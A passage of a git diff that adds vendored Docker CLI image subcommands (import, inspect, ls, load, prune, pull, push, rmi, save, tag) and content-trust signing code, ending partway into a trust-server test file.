) + + if opts.source == "-" { + in = dockerCli.In() + } else if !urlutil.IsURL(opts.source) { + srcName = "-" + file, err := os.Open(opts.source) + if err != nil { + return err + } + defer file.Close() + in = file + } + + source := types.ImageImportSource{ + Source: in, + SourceName: srcName, + } + + options := types.ImageImportOptions{ + Message: opts.message, + Changes: opts.changes.GetAll(), + } + + clnt := dockerCli.Client() + + responseBody, err := clnt.ImageImport(context.Background(), source, opts.reference, options) + if err != nil { + return err + } + defer responseBody.Close() + + return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/inspect.go b/vendor/github.com/docker/docker/cli/command/image/inspect.go new file mode 100644 index 0000000000..217863c772 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/inspect.go @@ -0,0 +1,44 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + refs []string +} + +// newInspectCommand creates a new cobra.Command for `docker image inspect` +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] IMAGE [IMAGE...]", + Short: "Display detailed information on one or more images", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.refs = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + getRefFunc := func(ref string) (interface{}, []byte, error) { + return client.ImageInspectWithRaw(ctx, ref) + } + return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/list.go b/vendor/github.com/docker/docker/cli/command/image/list.go new file mode 100644 index 0000000000..679604fc02 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/list.go @@ -0,0 +1,96 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type imagesOptions struct { + matchName string + + quiet bool + all bool + noTrunc bool + showDigests bool + format string + filter opts.FilterOpt +} + +// NewImagesCommand creates a new `docker images` command +func NewImagesCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := imagesOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "images [OPTIONS] [REPOSITORY[:TAG]]", + Short: "List images", + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + if len(args) > 0 { + opts.matchName = args[0] + } + return runImages(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") + flags.BoolVarP(&opts.all, "all", "a", false, "Show all images (default hides intermediate images)") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + flags.BoolVar(&opts.showDigests, "digests", false, "Show digests") + flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := *NewImagesCommand(dockerCli) + cmd.Aliases = []string{"images", "list"} + cmd.Use = "ls [OPTIONS] [REPOSITORY[:TAG]]" + return &cmd +} + +func runImages(dockerCli *command.DockerCli, opts imagesOptions) error { + ctx := context.Background() + + filters := opts.filter.Value() + if opts.matchName != "" { + filters.Add("reference", opts.matchName) + } + + options := types.ImageListOptions{ + All: opts.all, + Filters: filters, + } + + images, err := dockerCli.Client().ImageList(ctx, options) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().ImagesFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().ImagesFormat + } else { + format = formatter.TableFormatKey + } + } + + imageCtx := formatter.ImageContext{ + Context: formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewImageFormat(format, opts.quiet, opts.showDigests), + Trunc: !opts.noTrunc, + }, + Digest: opts.showDigests, + } + return formatter.ImageWrite(imageCtx, images) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/load.go b/vendor/github.com/docker/docker/cli/command/image/load.go new file mode 100644 index 0000000000..988f5106e2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/load.go @@ -0,0 +1,77 @@ +package image + +import ( + "fmt" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/system" + "github.com/spf13/cobra" +) + +type loadOptions struct { + input string + quiet bool +} + +// NewLoadCommand creates a new `docker load` command +func NewLoadCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts loadOptions + + cmd := &cobra.Command{ + Use: "load [OPTIONS]", + Short: "Load an image from a tar archive or STDIN", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runLoad(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.input, "input", "i", "", "Read from tar archive file, instead of STDIN") + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Suppress the load output") + + return cmd +} + +func runLoad(dockerCli *command.DockerCli, opts loadOptions) error { + + var input io.Reader = dockerCli.In() + if opts.input != "" { + // We use system.OpenSequential to use sequential file access on Windows, avoiding + // depleting the standby list un-necessarily. On Linux, this equates to a regular os.Open. + file, err := system.OpenSequential(opts.input) + if err != nil { + return err + } + defer file.Close() + input = file + } + + // To avoid getting stuck, verify that a tar file is given either in + // the input flag or through stdin and if not display an error message and exit. + if opts.input == "" && dockerCli.In().IsTerminal() { + return fmt.Errorf("requested load from stdin, but stdin is empty") + } + + if !dockerCli.Out().IsTerminal() { + opts.quiet = true + } + response, err := dockerCli.Client().ImageLoad(context.Background(), input, opts.quiet) + if err != nil { + return err + } + defer response.Body.Close() + + if response.Body != nil && response.JSON { + return jsonmessage.DisplayJSONMessagesToStream(response.Body, dockerCli.Out(), nil) + } + + _, err = io.Copy(dockerCli.Out(), response.Body) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/image/prune.go b/vendor/github.com/docker/docker/cli/command/image/prune.go new file mode 100644 index 0000000000..82c28fcf49 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/prune.go @@ -0,0 +1,92 @@ +package image + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool + all bool +} + +// NewPruneCommand returns a new cobra prune command for images +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove unused images", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + spaceReclaimed, output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images, not just dangling ones") + + return cmd +} + +const ( + allImageWarning = `WARNING! This will remove all images without at least one container associated to them. +Are you sure you want to continue?` + danglingWarning = `WARNING! This will remove all dangling images. +Are you sure you want to continue?` +) + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { + pruneFilters := filters.NewArgs() + pruneFilters.Add("dangling", fmt.Sprintf("%v", !opts.all)) + + warning := danglingWarning + if opts.all { + warning = allImageWarning + } + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().ImagesPrune(context.Background(), pruneFilters) + if err != nil { + return + } + + if len(report.ImagesDeleted) > 0 { + output = "Deleted Images:\n" + for _, st := range report.ImagesDeleted { + if st.Untagged != "" { + output += fmt.Sprintln("untagged:", st.Untagged) + } else { + output += fmt.Sprintln("deleted:", st.Deleted) + } + } + spaceReclaimed = report.SpaceReclaimed + } + + return +} + +// RunPrune calls the Image Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { + return runPrune(dockerCli, pruneOptions{force: true, all: all}) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/pull.go b/vendor/github.com/docker/docker/cli/command/image/pull.go new file mode 100644 index 0000000000..24933fe846 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/pull.go @@ -0,0 +1,84 @@ +package image + +import ( + "errors" + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +type pullOptions struct { + remote string + all bool +} + +// NewPullCommand creates a new `docker pull` command +func NewPullCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pullOptions + + cmd := &cobra.Command{ + Use: "pull [OPTIONS] NAME[:TAG|@DIGEST]", + Short: "Pull an image or a repository from a registry", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.remote = args[0] + return runPull(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.all, "all-tags", "a", false, "Download all tagged images in the repository") + command.AddTrustedFlags(flags, true) + + return cmd +} + +func runPull(dockerCli *command.DockerCli, opts pullOptions) error { + distributionRef, err := reference.ParseNamed(opts.remote) + if err != nil { + return err + } + if opts.all && !reference.IsNameOnly(distributionRef) { + return errors.New("tag can't be used with --all-tags/-a") + } + + if !opts.all && reference.IsNameOnly(distributionRef) { + distributionRef = reference.WithDefaultTag(distributionRef) + fmt.Fprintf(dockerCli.Out(), "Using default tag: %s\n", reference.DefaultTag) + } + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := registry.ParseRepositoryInfo(distributionRef) + if err != nil { + return err + } + + ctx := context.Background() + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "pull") + + // Check if reference has a digest + _, isCanonical := distributionRef.(reference.Canonical) + if command.IsTrusted() && !isCanonical { + err = trustedPull(ctx, dockerCli, repoInfo, distributionRef, authConfig, requestPrivilege) + } else { + err = imagePullPrivileged(ctx, dockerCli, authConfig, distributionRef.String(), requestPrivilege, opts.all) + } + if err != nil { + if strings.Contains(err.Error(), "target is plugin") { + return errors.New(err.Error() + " - Use `docker plugin install`") + } + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/push.go b/vendor/github.com/docker/docker/cli/command/image/push.go new file mode 100644 index 0000000000..a8ce4945ec --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/push.go @@ -0,0 +1,61 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +// NewPushCommand creates a new `docker push` command +func NewPushCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "push [OPTIONS] NAME[:TAG]", + Short: "Push an image or a repository to a registry", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runPush(dockerCli, args[0]) + }, + } + + flags := cmd.Flags() + + command.AddTrustedFlags(flags, true) + + return cmd +} + +func runPush(dockerCli *command.DockerCli, remote string) error { + ref, err := reference.ParseNamed(remote) + if err != nil { + return err + } + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := registry.ParseRepositoryInfo(ref) + if err != nil { + return err + } + + ctx := context.Background() + + // Resolve the Auth config relevant for this server + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "push") + + if command.IsTrusted() { + return trustedPush(ctx, dockerCli, repoInfo, ref, authConfig, requestPrivilege) + } + + responseBody, err := imagePushPrivileged(ctx, dockerCli, authConfig, ref.String(), requestPrivilege) + if err != nil { + return err + } + + defer responseBody.Close() + return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/remove.go b/vendor/github.com/docker/docker/cli/command/image/remove.go new file mode 100644 index 0000000000..c79ceba7a8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/remove.go @@ -0,0 +1,77 @@ +package image + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + force bool + noPrune bool +} + +// NewRemoveCommand creates a new `docker remove` command +func NewRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rmi [OPTIONS] IMAGE [IMAGE...]", + Short: "Remove one or more images", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, opts, args) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.force, "force", "f", false, "Force removal of the image") + flags.BoolVar(&opts.noPrune, "no-prune", false, "Do not delete untagged parents") + + return cmd +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := *NewRemoveCommand(dockerCli) + cmd.Aliases = []string{"rmi", "remove"} + cmd.Use = "rm [OPTIONS] IMAGE [IMAGE...]" + return &cmd +} + +func runRemove(dockerCli *command.DockerCli, opts removeOptions, images []string) error { + client := dockerCli.Client() + ctx := context.Background() + + options := types.ImageRemoveOptions{ + Force: opts.force, + PruneChildren: !opts.noPrune, + } + + var errs []string + for _, image := range images { + dels, err := client.ImageRemove(ctx, image, options) + if err != nil { + errs = append(errs, err.Error()) + } else { + for _, del := range dels { + if del.Deleted != "" { + fmt.Fprintf(dockerCli.Out(), "Deleted: %s\n", del.Deleted) + } else { + fmt.Fprintf(dockerCli.Out(), "Untagged: %s\n", del.Untagged) + } + } + } + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/save.go b/vendor/github.com/docker/docker/cli/command/image/save.go new file mode 100644 index 0000000000..bbe82d2a05 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/save.go @@ -0,0 +1,57 @@ +package image + +import ( + "errors" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type saveOptions struct { + images []string + output string +} + +// NewSaveCommand creates a new `docker save` command +func NewSaveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts saveOptions + + cmd := &cobra.Command{ + Use: "save [OPTIONS] IMAGE [IMAGE...]", + Short: "Save one or more images to a tar archive (streamed to STDOUT by default)", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.images = args + return runSave(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") + + return cmd +} + +func runSave(dockerCli *command.DockerCli, opts saveOptions) error { + if opts.output == "" && dockerCli.Out().IsTerminal() { + return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.") + } + + responseBody, err := dockerCli.Client().ImageSave(context.Background(), opts.images) + if err != nil { + return err + } + defer responseBody.Close() + + if opts.output == "" { + _, err := io.Copy(dockerCli.Out(), responseBody) + return err + } + + return command.CopyToFile(opts.output, responseBody) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/tag.go b/vendor/github.com/docker/docker/cli/command/image/tag.go new file mode 100644 index 0000000000..fb2b703856 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/tag.go @@ -0,0 +1,41 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type tagOptions struct { + image string + name string +} + +// NewTagCommand creates a new `docker tag` command +func NewTagCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts tagOptions + + cmd := &cobra.Command{ + Use: "tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]", + Short: "Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.image = args[0] + opts.name = args[1] + return runTag(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + return cmd +} + +func runTag(dockerCli *command.DockerCli, opts tagOptions) error { + ctx := context.Background() + + return dockerCli.Client().ImageTag(ctx, opts.image, opts.name) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/trust.go b/vendor/github.com/docker/docker/cli/command/image/trust.go new file mode 100644 index 0000000000..5136a22156 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/trust.go @@ -0,0 +1,381 @@ +package image + +import ( + "encoding/hex" + "encoding/json" + "errors" + "fmt" + "io" + "path" + "sort" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/trust" + "github.com/docker/docker/distribution" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/notary/client" + "github.com/docker/notary/tuf/data" +) + +type target struct { + name string + digest digest.Digest + size int64 +} + +// trustedPush handles content trust pushing of an image +func trustedPush(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { + responseBody, err := imagePushPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege) + if err != nil { + return err + } + + defer responseBody.Close() + + return PushTrustedReference(cli, repoInfo, ref, authConfig, responseBody) +} + +// PushTrustedReference pushes a canonical reference to the trust server. +func PushTrustedReference(cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, in io.Reader) error { + // If it is a trusted push we would like to find the target entry which match the + // tag provided in the function and then do an AddTarget later. + target := &client.Target{} + // Count the times of calling for handleTarget, + // if it is called more that once, that should be considered an error in a trusted push. + cnt := 0 + handleTarget := func(aux *json.RawMessage) { + cnt++ + if cnt > 1 { + // handleTarget should only be called one. This will be treated as an error. + return + } + + var pushResult distribution.PushResult + err := json.Unmarshal(*aux, &pushResult) + if err == nil && pushResult.Tag != "" && pushResult.Digest.Validate() == nil { + h, err := hex.DecodeString(pushResult.Digest.Hex()) + if err != nil { + target = nil + return + } + target.Name = pushResult.Tag + target.Hashes = data.Hashes{string(pushResult.Digest.Algorithm()): h} + target.Length = int64(pushResult.Size) + } + } + + var tag string + switch x := ref.(type) { + case reference.Canonical: + return errors.New("cannot push a digest reference") + case reference.NamedTagged: + tag = x.Tag() + default: + // We want trust signatures to always take an explicit tag, + // otherwise it will act as an untrusted push. + if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), nil); err != nil { + return err + } + fmt.Fprintln(cli.Out(), "No tag specified, skipping trust metadata push") + return nil + } + + if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), handleTarget); err != nil { + return err + } + + if cnt > 1 { + return fmt.Errorf("internal error: only one call to handleTarget expected") + } + + if target == nil { + fmt.Fprintln(cli.Out(), "No targets found, please provide a specific tag in order to sign it") + return nil + } + + fmt.Fprintln(cli.Out(), "Signing and pushing trust metadata") + + repo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "push", "pull") + if err != nil { + fmt.Fprintf(cli.Out(), "Error establishing connection to notary repository: %s\n", err) + return err + } + + // get the latest repository metadata so we can figure out which roles to sign + err = repo.Update(false) + + switch err.(type) { + case client.ErrRepoNotInitialized, client.ErrRepositoryNotExist: + keys := repo.CryptoService.ListKeys(data.CanonicalRootRole) + var rootKeyID string + // always select the first root key + if len(keys) > 0 { + sort.Strings(keys) + rootKeyID = keys[0] + } else { + rootPublicKey, err := repo.CryptoService.Create(data.CanonicalRootRole, "", data.ECDSAKey) + if err != nil { + return err + } + rootKeyID = rootPublicKey.ID() + } + + // Initialize the notary repository with a remotely managed snapshot key + if err := repo.Initialize([]string{rootKeyID}, data.CanonicalSnapshotRole); err != nil { + return trust.NotaryError(repoInfo.FullName(), err) + } + fmt.Fprintf(cli.Out(), "Finished initializing %q\n", repoInfo.FullName()) + err = repo.AddTarget(target, data.CanonicalTargetsRole) + case nil: + // already initialized and we have successfully downloaded the latest metadata + err = addTargetToAllSignableRoles(repo, target) + default: + return trust.NotaryError(repoInfo.FullName(), err) + } + + if err == nil { + err = repo.Publish() + } + + if err != nil { + fmt.Fprintf(cli.Out(), "Failed to sign %q:%s - %s\n", repoInfo.FullName(), tag, err.Error()) + return trust.NotaryError(repoInfo.FullName(), err) + } + + fmt.Fprintf(cli.Out(), "Successfully signed %q:%s\n", repoInfo.FullName(), tag) + return nil +} + +// Attempt to add the image target to all the top level delegation roles we can +// (based on whether we have the signing key and whether the role's path allows +// us to). +// If there are no delegation roles, we add to the targets role. +func addTargetToAllSignableRoles(repo *client.NotaryRepository, target *client.Target) error { + var signableRoles []string + + // translate the full key names, which includes the GUN, into just the key IDs + allCanonicalKeyIDs := make(map[string]struct{}) + for fullKeyID := range repo.CryptoService.ListAllKeys() { + allCanonicalKeyIDs[path.Base(fullKeyID)] = struct{}{} + } + + allDelegationRoles, err := repo.GetDelegationRoles() + if err != nil { + return err + } + + // if there are no delegation roles, then just try to sign it into the targets role + if len(allDelegationRoles) == 0 { + return repo.AddTarget(target, data.CanonicalTargetsRole) + } + + // there are delegation roles, find every delegation role we have a key for, and + // attempt to sign into into all those roles. + for _, delegationRole := range allDelegationRoles { + // We do not support signing any delegation role that isn't a direct child of the targets role. + // Also don't bother checking the keys if we can't add the target + // to this role due to path restrictions + if path.Dir(delegationRole.Name) != data.CanonicalTargetsRole || !delegationRole.CheckPaths(target.Name) { + continue + } + + for _, canonicalKeyID := range delegationRole.KeyIDs { + if _, ok := allCanonicalKeyIDs[canonicalKeyID]; ok { + signableRoles = append(signableRoles, delegationRole.Name) + break + } + } + } + + if len(signableRoles) == 0 { + return fmt.Errorf("no valid signing keys for delegation roles") + } + + return repo.AddTarget(target, signableRoles...) +} + +// imagePushPrivileged push the image +func imagePushPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc) (io.ReadCloser, error) { + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return nil, err + } + options := types.ImagePushOptions{ + RegistryAuth: encodedAuth, + PrivilegeFunc: requestPrivilege, + } + + return cli.Client().ImagePush(ctx, ref, options) +} + +// trustedPull handles content trust pulling of an image +func trustedPull(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { + var refs []target + + notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") + if err != nil { + fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) + return err + } + + if tagged, isTagged := ref.(reference.NamedTagged); !isTagged { + // List all targets + targets, err := notaryRepo.ListTargets(trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return trust.NotaryError(repoInfo.FullName(), err) + } + for _, tgt := range targets { + t, err := convertTarget(tgt.Target) + if err != nil { + fmt.Fprintf(cli.Out(), "Skipping target for %q\n", repoInfo.Name()) + continue + } + // Only list tags in the top level targets role or the releases delegation role - ignore + // all other delegation roles + if tgt.Role != trust.ReleasesRole && tgt.Role != data.CanonicalTargetsRole { + continue + } + refs = append(refs, t) + } + if len(refs) == 0 { + return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trusted tags for %s", repoInfo.FullName())) + } + } else { + t, err := notaryRepo.GetTargetByName(tagged.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return trust.NotaryError(repoInfo.FullName(), err) + } + // Only get the tag if it's in the top level targets role or the releases delegation role + // ignore it if it's in any other delegation roles + if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { + return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", tagged.Tag())) + } + + logrus.Debugf("retrieving target for %s role\n", t.Role) + r, err := convertTarget(t.Target) + if err != nil { + return err + + } + refs = append(refs, r) + } + + for i, r := range refs { + displayTag := r.name + if displayTag != "" { + displayTag = ":" + displayTag + } + fmt.Fprintf(cli.Out(), "Pull (%d of %d): %s%s@%s\n", i+1, len(refs), repoInfo.Name(), displayTag, r.digest) + + ref, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) + if err != nil { + return err + } + if err := imagePullPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege, false); err != nil { + return err + } + + tagged, err := reference.WithTag(repoInfo, r.name) + if err != nil { + return err + } + trustedRef, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) + if err != nil { + return err + } + if err := TagTrusted(ctx, cli, trustedRef, tagged); err != nil { + return err + } + } + return nil +} + +// imagePullPrivileged pulls the image and displays it to the output +func imagePullPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc, all bool) error { + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + options := types.ImagePullOptions{ + RegistryAuth: encodedAuth, + PrivilegeFunc: requestPrivilege, + All: all, + } + + responseBody, err := cli.Client().ImagePull(ctx, ref, options) + if err != nil { + return err + } + defer responseBody.Close() + + return jsonmessage.DisplayJSONMessagesToStream(responseBody, cli.Out(), nil) +} + +// TrustedReference returns the canonical trusted reference for an image reference +func TrustedReference(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged, rs registry.Service) (reference.Canonical, error) { + var ( + repoInfo *registry.RepositoryInfo + err error + ) + if rs != nil { + repoInfo, err = rs.ResolveRepository(ref) + } else { + repoInfo, err = registry.ParseRepositoryInfo(ref) + } + if err != nil { + return nil, err + } + + // Resolve the Auth config relevant for this server + authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) + + notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") + if err != nil { + fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) + return nil, err + } + + t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return nil, trust.NotaryError(repoInfo.FullName(), err) + } + // Only list tags in the top level targets role or the releases delegation role - ignore + // all other delegation roles + if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { + return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.Tag())) + } + r, err := convertTarget(t.Target) + if err != nil { + return nil, err + + } + + return reference.WithDigest(reference.TrimNamed(ref), r.digest) +} + +func convertTarget(t client.Target) (target, error) { + h, ok := t.Hashes["sha256"] + if !ok { + return target{}, errors.New("no valid hash, expecting sha256") + } + return target{ + name: t.Name, + digest: digest.NewDigestFromHex("sha256", hex.EncodeToString(h)), + size: t.Length, + }, nil +} + +// TagTrusted tags a trusted ref +func TagTrusted(ctx context.Context, cli *command.DockerCli, trustedRef reference.Canonical, ref reference.NamedTagged) error { + fmt.Fprintf(cli.Out(), "Tagging %s as %s\n", trustedRef.String(), ref.String()) + + return cli.Client().ImageTag(ctx, trustedRef.String(), ref.String()) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/trust_test.go b/vendor/github.com/docker/docker/cli/command/image/trust_test.go new file mode 100644 index 0000000000..78146465e6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/trust_test.go @@ -0,0 +1,57 @@ +package image + +import ( + "os" + "testing" + + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli/trust" + "github.com/docker/docker/registry" +) + +func unsetENV() { + os.Unsetenv("DOCKER_CONTENT_TRUST") + os.Unsetenv("DOCKER_CONTENT_TRUST_SERVER") +} + +func TestENVTrustServer(t *testing.T) { + defer unsetENV() + indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} + if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "https://notary-test.com:5000"); err != nil { + t.Fatal("Failed to set ENV variable") + } + output, err := trust.Server(indexInfo) + expectedStr := "https://notary-test.com:5000" + if err != nil || output != expectedStr { + t.Fatalf("Expected server to be %s, got %s", expectedStr, output) + } +} + +func TestHTTPENVTrustServer(t *testing.T) { + defer unsetENV() + indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} + if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "http://notary-test.com:5000"); err != nil { + t.Fatal("Failed to set ENV variable") + } + _, err := trust.Server(indexInfo) + if err == nil { + t.Fatal("Expected error with invalid scheme") + } +} + +func TestOfficialTrustServer(t *testing.T) { + indexInfo := 